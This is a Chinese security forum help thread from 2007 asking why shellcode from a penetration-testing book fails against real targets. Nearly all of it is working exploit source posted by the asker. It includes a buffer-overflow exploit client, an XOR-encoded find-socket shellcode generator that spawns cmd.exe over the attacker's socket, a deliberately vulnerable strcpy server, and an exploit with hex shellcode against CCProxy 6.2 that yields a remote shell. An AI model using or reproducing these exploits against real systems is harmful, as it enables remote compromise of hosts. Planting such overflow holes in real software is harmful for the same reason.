[求助]请shellcode高手进来看看-付费问答-看雪-安全社区|安全招聘|kanxue.com

[旧帖] [求助]请shellcode高手进来看看 0.00雪花

发表于: 2007-8-13 12:24 4254

[旧帖] [求助]请shellcode高手进来看看 0.00雪花

sunhfmy

活跃值

2007-8-13 12:24

4254

《网络渗透技术》的演示代码，为什么会在有漏洞的演示程序中有效，而在真实的溢出漏洞下无效？

[培训]内核驱动高级班，冲击BAT一流互联网大厂工作，每周日13:00-18:00直播授课

收藏・0

免费・1

支持

分享

最新回复 (4)
sunhfmy 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 5 粉丝 0 关注私信	sunhfmy 2 楼 /* client_match_string.c - find socket demo * * 《网络渗透技术》演示程序 * 作者：san, alert7, eyas, watercloud * * 字串匹配查找socket的shellcode演示 / #include <stdio.h> #include <stdlib.h> #include <windows.h> #pragma comment (lib,"ws2_32") // jmp esp address from Chinese Ansi Code Page #define JUMPESP "\x12\x45\xfa\x7f" #include "shellcode_match_string.c" // ripped from isno int Make_Connection(char address,int port,int timeout) { struct sockaddr_in target; SOCKET s; int i; DWORD bf; fd_set wd; struct timeval tv; s = socket(AF_INET,SOCK_STREAM,0); if(s<0) return -1; target.sin_family = AF_INET; target.sin_addr.s_addr = inet_addr(address); if(target.sin_addr.s_addr==0) { closesocket(s); return -2; } target.sin_port = htons(port); bf = 1; ioctlsocket(s,FIONBIO,&bf); tv.tv_sec = timeout; tv.tv_usec = 0; FD_ZERO(&wd); FD_SET(s,&wd); connect(s,(struct sockaddr )&target,sizeof(target)); if((i=select(s+1,0,&wd,0,&tv))==(-1)) { closesocket(s); return -3; } if(i==0) { closesocket(s); return -4; } i = sizeof(int); getsockopt(s,SOL_SOCKET,SO_ERROR,(char )&bf,&i); if((bf!=0)\|\|(i!=sizeof(int))) { closesocket(s); return -5; } ioctlsocket(s,FIONBIO,&bf); return s; } /* ripped from TESO code and modifed by ey4s for win32 / void shell (int sock) { int l; char buf[512]; struct timeval time; unsigned long ul[2]; time.tv_sec = 1; time.tv_usec = 0; while (1) { ul[0] = 1; ul[1] = sock; l = select (0, (fd_set )&ul, NULL, NULL, &time); if(l==1) { l = recv (sock, buf, sizeof (buf), 0); if (l <= 0) { printf ("[-] Connection closed.\n"); return; } l = write (1, buf, l); if (l <= 0) { printf ("[-] Connection closed.\n"); return; } } else { l = read (0, buf, sizeof (buf)); if (l <= 0) { printf("[-] Connection closed.\n"); return; } l = send(sock, buf, l, 0); if (l <= 0) { printf("[-] Connection closed.\n"); return; } } } } int main(int argc, char argv[]) { unsigned char Buff[1024]; char data[4] = "Xc0n"; SOCKET c,s; WSADATA WSAData; struct sockaddr_in sa; if (argc < 2) { fprintf(stderr, "Usage: %s remote_addr", argv[0]); exit(1); } GetShellCode(); PrintSc(sh_Buff, sh_Len); if (!sh_Len) { printf("[-] Shellcode generate error.\n"); exit(1); } if(WSAStartup (MAKEWORD(1,1), &WSAData) != 0) { fprintf(stderr, "[-] WSAStartup failed.\n"); WSACleanup(); exit(1); } s = Make_Connection(argv[1], 4444, 10); if(s<0) { fprintf(stderr, "[-] connect err.\n"); exit(1); } memset(Buff, 0x90, sizeof(Buff)-1); strcpy(Buff+20, JUMPESP); strcpy(Buff+24, sh_Buff); //strcpy(Buff+56, JUMPESP); //strcpy(Buff+60, (unsigned char )sh_Buff); //PrintSc(Buff, sizeof(Buff)); send(s, Buff, sizeof(Buff), 0); Sleep(100); send(s, data, 4, 0); // use same socket to get shell shell(s); WSACleanup(); return 1; } 2007-8-13 15:16 0
sunhfmy 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 5 粉丝 0 关注私信	sunhfmy 3 楼 /* shellcode_match_string.c * * 《网络渗透技术》演示程序 * 作者：san, alert7, eyas, watercloud * * 字串匹配查找socket的shellcode演示 / #define PROC_BEGIN __asm _emit 0x90 __asm _emit 0x90 __asm _emit 0x90 __asm _emit 0x90\ __asm _emit 0x90 __asm _emit 0x90 __asm _emit 0x90 __asm _emit 0x90 #define PROC_END PROC_BEGIN unsigned char sh_Buff[1024]; unsigned int sh_Len; unsigned int Enc_key=0x99; unsigned char decode1[] = / 00401004 . /EB 0E JMP SHORT encode.00401014 00401006 $ \|5B POP EBX 00401007 . \|4B DEC EBX 00401008 . \|33C9 XOR ECX,ECX 0040100A . \|B1 FF MOV CL,0FF 0040100C > \|80340B 99 XOR BYTE PTR DS:[EBX+ECX],99 00401010 .^\|E2 FA LOOPD SHORT encode.0040100C 00401012 . \|EB 05 JMP SHORT encode.00401019 00401014 > \E8 EDFFFFFF CALL encode.00401006 / "\xEB\x0E\x5B\x4B\x33\xC9\xB1" "\xFF" // shellcode size "\x80\x34\x0B" "\x99" // xor byte "\xE2\xFA\xEB\x05\xE8\xED\xFF\xFF\xFF"; unsigned char decode2[] = / ripped from eyas 00406030 /EB 10 JMP SHORT 00406042 00406032 \|5B POP EBX 00406033 \|4B DEC EBX 00406034 \|33C9 XOR ECX,ECX 00406036 \|66:B9 6601 MOV CX,166 0040603A \|80340B 99 XOR BYTE PTR DS:[EBX+ECX],99 0040603E ^\|E2 FA LOOPD SHORT 0040603A 00406040 \|EB 05 JMP SHORT 00406047 00406042 \E8 EBFFFFFF CALL 00406032 / "\xEB\x10\x5B\x4B\x33\xC9\x66\xB9" "\x66\x01" // shellcode size "\x80\x34\x0B" "\x99" // xor byte "\xE2\xFA\xEB\x05\xE8\xEB\xFF\xFF\xFF"; // kernel32.dll functions index #define _LoadLibraryA 0x00 #define _CreateProcessA 0x04 #define _TerminateProcess 0x08 #define _WaitForSingleObjectEx 0x0C #define _Sleep 0x10 // ws2_32.dll functions index #define _recv 0x14 #define _ioctlsocket 0x18 // functions number #define _Knums 5 #define _Wnums 2 // Need functions unsigned char functions[100][128] = { // kernel32 {"LoadLibraryA"}, {"CreateProcessA"}, {"TerminateProcess"}, {"WaitForSingleObjectEx"}, {"Sleep"}, // ws2_32 {"recv"}, {"ioctlsocket"}, {""}, }; void PrintSc(unsigned char lpBuff, int buffsize); void ShellCode(); // Get function hash unsigned long hash(unsigned char c) { unsigned long h=0; while(c) { h = ( ( h << 25 ) \| ( h >> 7 ) ) + c++; } return h; } // get shellcode void GetShellCode() { char fnbgn_str="\x90\x90\x90\x90\x90\x90\x90\x90\x90"; char fnend_str="\x90\x90\x90\x90\x90\x90\x90\x90\x90"; unsigned char pSc_addr; unsigned char pSc_Buff[1024]; unsigned int MAX_Sc_Len=0x2000; unsigned long dwHash[100]; unsigned int dwHashSize; int l,i,j,k; // Get functions hash for (i=0;;i++) { if (functions[i][0] == '\x0') break; dwHash[i] = hash(functions[i]); //fprintf(stderr, "%.8X\t%s\n", dwHash[i], functions[i]); } dwHashSize = i4; // Deal with shellcode pSc_addr = (unsigned char )ShellCode; for (k=0;k<MAX_Sc_Len;++k ) { if(memcmp(pSc_addr+k,fnbgn_str, 8)==0) { break; } } pSc_addr+=(k+8); // start of the ShellCode for (k=0;k<MAX_Sc_Len;++k) { if(memcmp(pSc_addr+k,fnend_str, 8)==0) { break; } } sh_Len=k; // length of the ShellCode memcpy(pSc_Buff, pSc_addr, sh_Len); // Add functions hash memcpy(pSc_Buff+sh_Len, (unsigned char )dwHash, dwHashSize); sh_Len += dwHashSize; //printf("%d bytes shellcode\n", sh_Len); // print shellcode //PrintSc(pSc_Buff, sh_Len); // find xor byte for(i=0xff; i>0; i--) { l = 0; for(j=0; j<sh_Len; j++) { if ( // ((pSc_Buff[j] ^ i) == 0x26) \|\| //% // ((pSc_Buff[j] ^ i) == 0x3d) \|\| //= // ((pSc_Buff[j] ^ i) == 0x3f) \|\| //? // ((pSc_Buff[j] ^ i) == 0x40) \|\| //@ ((pSc_Buff[j] ^ i) == 0x00) \|\| // ((pSc_Buff[j] ^ i) == 0x0D) \|\| // ((pSc_Buff[j] ^ i) == 0x0A) \|\| ((pSc_Buff[j] ^ i) == 0x5C) ) { l++; break; }; } if (l==0) { Enc_key = i; //printf("Find XOR Byte: 0x%02X\n", i); for(j=0; j<sh_Len; j++) { pSc_Buff[j] ^= Enc_key; } break; // break when found xor byte } } // No xor byte found if (l!=0){ //fprintf(stderr, "No xor byte found!\n"); sh_Len = 0; } else { //fprintf(stderr, "Xor byte 0x%02X\n", Enc_key); // encode if (sh_Len > 0xFF) { (unsigned short )&decode2[8] = sh_Len; (unsigned char )&decode2[13] = Enc_key; memcpy(sh_Buff, decode2, sizeof(decode2)-1); memcpy(sh_Buff+sizeof(decode2)-1, pSc_Buff, sh_Len); sh_Len += sizeof(decode2)-1; } else { (unsigned char )&decode1[7] = sh_Len; (unsigned char )&decode1[11] = Enc_key; memcpy(sh_Buff, decode1, sizeof(decode1)-1); memcpy(sh_Buff+sizeof(decode1)-1, pSc_Buff, sh_Len); sh_Len += sizeof(decode1)-1; } } } // print shellcode void PrintSc(unsigned char lpBuff, int buffsize) { int i,j; char p; char msg[4]; fprintf(stderr, "/ %d bytes /\n",buffsize); for(i=0;i<buffsize;i++) { if((i%16)==0) if(i!=0) fprintf(stderr, "\"\n\""); else fprintf(stderr, "\""); sprintf(msg,"\\x%.2X",lpBuff[i]&0xff); for( p = msg, j=0; j < 4; p++, j++ ) { if(isupper(p)) fprintf(stderr, "%c", _tolower(p)); else fprintf(stderr, "%c", p[0]); } } fprintf(stderr, "\";\n"); } // shellcode function void ShellCode() { __asm{ PROC_BEGIN //C macro to begin proc jmp locate_addr func_start: pop edi ; get eip mov eax, fs:30h mov eax, [eax+0Ch] mov esi, [eax+1Ch] lodsd mov ebp, [eax+8] ; base address of kernel32.dll mov esi, edi push _Knums pop ecx GetKFuncAddr: ; find functions from kernel32.dll call find_hashfunc_addr loop GetKFuncAddr push 3233h push 5F327377h ; ws2_32 push esp call dword ptr [esi+_LoadLibraryA] mov ebp, eax ; base address of ws2_32.dll push _Wnums pop ecx GetWFuncAddr: ; find functions from ws2_32.dll call find_hashfunc_addr loop GetWFuncAddr find_s: xor ebx, ebx push 1000 ; sleep to wait for character send call dword ptr [esi+_Sleep] ; maybe it is necessary in real internet find_s_loop: inc ebx ; socket push 1 push 10 push ebx call dword ptr [esi+_WaitForSingleObjectEx] test eax, eax ; ensure ebx is socket jnz find_s_loop push 0 push esp push 4004667Fh ; FIONREAD push ebx call dword ptr [esi+_ioctlsocket] pop ecx ; ensure this socket have 4 bit to read cmp ecx, 4 jne find_s_loop push eax mov ebp, esp push 0 push 4 push ebp push ebx call dword ptr [esi+_recv] pop eax cmp eax, 6E306358h ; recieve "Xc0n"? jnz find_s_loop sub esp, 54h mov edi, esp xor eax, eax push 14h pop ecx stack_zero1: mov [edi+ecx4], eax loop stack_zero1 mov byte ptr [edi+10h], 44h inc byte ptr [edi+3Ch] inc byte ptr [edi+3Dh] mov [edi+48h], ebx mov [edi+4Ch], ebx mov [edi+50h], ebx lea eax, [edi+10h] push 646D63h ; "cmd" mov ebx, esp push edi ; pi push eax ; si push ecx push ecx push ecx push 1 push ecx push ecx push ebx ; "cmd" push ecx call dword ptr [esi+_CreateProcessA] xor eax, eax dec eax push eax call dword ptr [esi+_TerminateProcess] find_hashfunc_addr: push ecx push esi mov esi, [ebp+3Ch] ; e_lfanew mov esi, [esi+ebp+78h] ; ExportDirectory RVA add esi, ebp ; rva2va push esi mov esi, [esi+20h] ; AddressOfNames RVA add esi, ebp ; rva2va xor ecx, ecx dec ecx find_start: inc ecx lodsd add eax, ebp xor ebx, ebx hash_loop: movsx edx, byte ptr [eax] cmp dl, dh jz short find_addr ror ebx, 7 ; hash add ebx, edx inc eax jmp short hash_loop find_addr: cmp ebx, [edi] ; compare to hash jnz short find_start pop esi ; ExportDirectory mov ebx, [esi+24h] ; AddressOfNameOrdinals RVA add ebx, ebp ; rva2va mov cx, [ebx+ecx2] ; FunctionOrdinal mov ebx, [esi+1Ch] ; AddressOfFunctions RVA add ebx, ebp ; rva2va mov eax, [ebx+ecx4] ; FunctionAddress RVA add eax, ebp ; rva2va stosd ; function address save to [edi] pop esi pop ecx retn locate_addr: call func_start PROC_END //C macro to end proc } } 2007-8-13 15:16 0
sunhfmy 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 5 粉丝 0 关注私信	sunhfmy 4 楼 /* server_thread.c * * 《网络渗透技术》演示程序 * 作者：san, alert7, eyas, watercloud * * 存在缓冲区溢出漏洞的多线程服务端演示 / #include <winsock2.h> #include <windows.h> #include <stdio.h> #pragma comment(lib,"ws2_32") SOCKET listenFD; void overflow(char p) { char buff[0x10]; strcpy(buff, p); printf("%s", buff); } DWORD WINAPI tt(LPVOID lp) { SOCKET s = (SOCKET)lp; int ret; char buff[0x800]; while(1) { ret = recv(s, buff, sizeof(buff)-1, 0);//overflow printf("recv %d bytes!\n", ret); if(ret > 0) { buff[ret] = '\x0'; overflow(buff); send(s, buff, ret, 0); } else { printf("[-] recv error:%d\n", WSAGetLastError()); break; } } closesocket(s); return 0; } void main() { SOCKET s1, s2,s3; struct sockaddr_in server; WSADATA wsd; char buff[0x500]; WSAStartup(MAKEWORD(2,2), &wsd); s1 = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); s2 = WSASocket(2,1,0,0,0,0); listenFD = s2; printf("[+] listen socket: %x\n", listenFD); server.sin_family = AF_INET; server.sin_port = htons(4444); server.sin_addr.s_addr= 0; bind(listenFD, (struct sockaddr *)&server, sizeof(server)); listen(listenFD, 100); while(1) { s3 = accept(listenFD, 0, 0); printf("[+] client socket: %x\n", s3); CreateThread(0, 0, tt, s3, 0, 0); } } 2007-8-13 15:18 0
sunhfmy 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 5 粉丝 0 关注私信	sunhfmy 5 楼 /* exploit.c * * CCProxy6.2 溢出演示程序 * 作者：cooldiyer * / #include <stdio.h> #include <stdlib.h> #include <windows.h> #pragma comment (lib,"ws2_32") // jmp esp address of chinese version #define JUMPESP "\x12\x45\xfa\x7f" // match string shellcode char shellcode[] = "\xeb\x10\x5b\x4b\x33\xc9\x66\xb9\x1f\x01\x80\x34\x0b\xf8\xe2\xfa" "\xeb\x05\xe8\xeb\xff\xff\xff\x11\x01\xf8\xf8\xf8\xa7\x9c\x59\xc8" "\xf8\xf8\xf8\x73\xb8\xf4\x73\x88\xe4\x55\x73\x90\xf0\x73\x0f\x92" "\xfd\xa1\x10\x61\xf8\xf8\xf8\x1a\x01\x90\xcb\xca\xf8\xf8\x90\x8f" "\x8b\xca\xa7\xac\x07\xee\x73\x10\x92\xfa\xa1\x10\x78\xf8\xf8\xf8" "\x1a\x01\xcb\x23\x90\x10\xfb\xf8\xf8\x07\xae\xe8\xbb\x92\xf9\x92" "\xf2\xab\x07\xae\xf4\x7d\x38\x8d\x0b\x92\xf8\xac\x90\x87\x9e\xfc" "\xb8\xab\x07\xae\xe0\xa1\x7b\x01\xfc\x8d\x19\xa8\x73\x14\x92\xf8" "\x92\xfc\xad\xab\x07\xae\xec\xa0\xc5\xa0\x9b\xc8\x96\x8d\x35\x7b" "\x14\xac\x73\x04\xcb\x38\x92\xec\xa1\x71\xfc\x77\x1a\x03\x3e\xbf" "\xe8\xbc\x06\xbf\xc4\x06\xbf\xc5\x71\xa7\xb0\x71\xa7\xb4\x71\xa7" "\xa8\x75\xbf\xe8\x90\x9b\x95\x9c\xf8\x73\x24\xaf\xa8\xa9\xa9\xa9" "\x92\xf9\xa9\xa9\xab\xa9\x07\xae\xfc\xcb\x38\xb0\xa8\x07\xae\xf0" "\xa9\xae\x73\x8d\xc4\x73\x8c\xd6\x80\xfb\x0d\xae\x73\x8e\xd8\xfb" "\x0d\xcb\x31\xb1\xb9\x55\xfb\x3d\xcb\x23\xf7\x46\xe8\xc2\x2e\x8c" "\xf0\x39\x33\xff\xfb\x22\xb8\x13\x09\xc3\xe7\x8d\x1f\xa6\x73\xa6" "\xdc\xfb\x25\x9e\x73\xf4\xb3\x73\xa6\xe4\xfb\x25\x73\xfc\x73\xfb" "\x3d\x53\xa6\xa1\x3b\x10\xfa\x07\x07\x07\xca\x8c\x69\xf4\x31\x44" "\x5e\x93\x77\x0a\xe0\x99\x2b\x70\xd0\xb1\x58\x9d\x6f\x33\x8e\x68" "\x6f\x3f\xaa\x7b\x11\x12"; // ripped from isno int Make_Connection(char address,int port,int timeout) { struct sockaddr_in target; SOCKET s; int i; DWORD bf; fd_set wd; struct timeval tv; s = socket(AF_INET,SOCK_STREAM,0); if(s<0) return -1; target.sin_family = AF_INET; target.sin_addr.s_addr = inet_addr(address); if(target.sin_addr.s_addr==0) { closesocket(s); return -2; } target.sin_port = htons(port); bf = 1; ioctlsocket(s,FIONBIO,&bf); tv.tv_sec = timeout; tv.tv_usec = 0; FD_ZERO(&wd); FD_SET(s,&wd); connect(s,(struct sockaddr )&target,sizeof(target)); if((i=select(s+1,0,&wd,0,&tv))==(-1)) { closesocket(s); return -3; } if(i==0) { closesocket(s); return -4; } i = sizeof(int); getsockopt(s,SOL_SOCKET,SO_ERROR,(char )&bf,&i); if((bf!=0)\|\|(i!=sizeof(int))) { closesocket(s); return -5; } ioctlsocket(s,FIONBIO,&bf); return s; } /* ripped from TESO code and modifed by ey4s for win32 / void shell (int sock) { int l; char buf[512]; struct timeval time; unsigned long ul[2]; time.tv_sec = 1; time.tv_usec = 0; while (1) { ul[0] = 1; ul[1] = sock; l = select (0, (fd_set )&ul, NULL, NULL, &time); if(l==1) { l = recv (sock, buf, sizeof (buf), 0); if (l <= 0) { printf ("[-] Connection closed.\n"); return; } l = write (1, buf, l); if (l <= 0) { printf ("[-] Connection closed.\n"); return; } } else { l = read (0, buf, sizeof (buf)); if (l <= 0) { printf("[-] Connection closed.\n"); return; } l = send(sock, buf, l, 0); if (l <= 0) { printf("[-] Connection closed.\n"); return; } } } } int main(int argc, char *argv[]) { SOCKET c,s; WSADATA WSAData; char Buff[3008],Recv[1024]; char data[4] = "Xc0n"; int i,nRet; if (argc < 3) { fprintf(stderr, "Usage: %s remote_addr remote_port", argv[0]); exit(1); } if(WSAStartup (MAKEWORD(1,1), &WSAData) != 0) { printf("[-] WSAStartup failed.\n"); WSACleanup(); exit(1); } memset(Buff, 0x90, sizeof(Buff)-1); // NOP 填充 memcpy(&Buff[0],"ping ",5); memcpy(&Buff[3005],"\r\n\0",3); // sizeof("ping ")+3000=3005 memcpy(&Buff[1017], JUMPESP,4); // sizeof("ping ")+1012=1017 memcpy(&Buff[9], shellcode,sizeof(shellcode)-1); // sizeof("ping ")+4=9 printf("[+] Connect %s Port %s\n",argv[1],argv[2]); s = Make_Connection(argv[1], atoi(argv[2]), 10); if(s<0) { printf("[-] connect err.\n"); exit(1); } memset(Recv,0,sizeof(Recv)); recv(s,Recv,sizeof(Recv),0); nRet=send(s,Buff,sizeof(Buff),0); memset(Recv,0,sizeof(Recv)); recv(s,Recv,sizeof(Recv),0); //Sleep(100); send(s, data, 4, 0); printf("[+] Send %d Bytes OK........\n[+] Wait For Connect To Shell\n",nRet); Sleep(1000); shell(s); WSACleanup(); return 1; } 2007-8-13 15:21 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

返回

sunhfmy

发帖

回帖

RANK

他的文章

[求助]请shellcode高手进来看看 4255

看雪公众号

专注于PC、移动、智能设备安全研究及逆向工程的开发者社区